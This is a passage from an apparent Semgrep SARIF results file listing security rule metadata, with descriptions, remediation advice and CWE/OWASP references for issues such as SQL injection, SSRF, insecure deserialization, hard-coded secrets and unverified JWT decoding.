token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token."},"helpUri":"https://semgrep.dev/r/javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","id":"javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","name":"javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse."},"help":{"markdown":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.request-data-fileresponse.request-data-fileresponse)\n - [https://django-book.readthedocs.io/en/latest/chapter20.html#cross-site-scripting-xss](https://django-book.readthedocs.io/en/latest/chapter20.html#cross-site-scripting-xss)\n","text":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.request-data-fileresponse.request-data-fileresponse","id":"python.django.security.injection.request-data-fileresponse.request-data-fileresponse","name":"python.django.security.injection.request-data-fileresponse.request-data-fileresponse","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.request-data-fileresponse.request-data-fileresponse"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"helpUri":"https://semgrep.dev/r/java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","id":"java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","name":"java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead."},"help":{"markdown":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4)\n - [https://www.pycryptodome.org/src/hash/hash#modern-hash-algorithms](https://www.pycryptodome.org/src/hash/hash#modern-hash-algorithms)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","id":"python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","name":"python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","id":"python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","name":"python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","id":"rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","name":"rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode."},"help":{"markdown":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n","text":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","id":"swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","name":"swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","properties":{"precision":"very-high","tags":["CWE-272: Least Privilege Violation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string)\n - [https://rorsecurity.info/portfolio/ruby-on-rails-sql-injection-cheat-sheet](https://rorsecurity.info/portfolio/ruby-on-rails-sql-injection-cheat-sheet)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"helpUri":"https://semgrep.dev/r/ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","id":"ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","name":"ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.ssrf.reqwest-taint.reqwest-taint)\n - [https://docs.rs/reqwest/latest/reqwest/](https://docs.rs/reqwest/latest/reqwest/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/rust.rocket.ssrf.reqwest-taint.reqwest-taint","id":"rust.rocket.ssrf.reqwest-taint.reqwest-taint","name":"rust.rocket.ssrf.reqwest-taint.reqwest-taint","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.ssrf.reqwest-taint.reqwest-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","id":"python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","name":"python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS."},"help":{"markdown":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","id":"terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","name":"terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"helpUri":"https://semgrep.dev/r/java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","id":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","name":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this."},"help":{"markdown":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.no-new-privileges.no-new-privileges)\n - [https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/)\n - [https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag)\n","text":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.no-new-privileges.no-new-privileges","id":"yaml.docker-compose.security.no-new-privileges.no-new-privileges","name":"yaml.docker-compose.security.no-new-privileges.no-new-privileges","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.no-new-privileges.no-new-privileges"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","id":"cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","name":"cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources."},"help":{"markdown":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/resource-exposure/](https://cloudsplaining.readthedocs.io/en/latest/glossary/resource-exposure/)\n - [https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py)\n","text":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","id":"terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","name":"terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","id":"php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","name":"php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL 